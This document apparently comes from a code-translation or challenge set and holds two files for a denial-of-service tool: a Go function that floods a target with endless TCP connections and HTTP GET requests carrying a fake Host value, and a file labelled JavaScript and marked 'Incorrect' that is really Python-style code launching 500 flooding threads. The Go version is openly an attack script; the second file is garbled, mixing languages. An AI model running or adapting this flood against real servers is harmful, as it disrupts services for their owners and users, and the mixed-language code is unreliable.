File: challenging/16_ddos/ddos.go
package main

import (
    "fmt"
    "net"
    "os"
    "os/signal"
    "strings"
    "sync"
    "syscall"
    "time"
)

var (
    target string
    port string
    fake_ip string
    already_connected int
)

func attack() {
    for {
        s, _ := net.Dial("tcp", target)
        s.Write([]byte("GET /" + target + " HTTP/1.1\r\n"))
        s.Write([]byte("Host: " + fake_ip + "\r\n\r\n"))
        s.Close()

        already_connected++
        if already_connected % 500 == 0 {
            fmt.Println(already_connected)
        }
    }
}

func main() {
    target = ""

File: challenging/16_ddos/ddos.js
// Incorrect
function attack() {
    while (true) {
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + "HTTP/1.1\r\n").encode("ascii"), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode("ascii"), (target,port))
        s.close()

        global already_connected
        already_connected += 1
        if already_connected % 500 == 0 {
            print(already_connected)
        }
    }
}

for (i = 0; i < 500; i++) {
    thread = threading.Thread(target=attack)
    thread.start()
}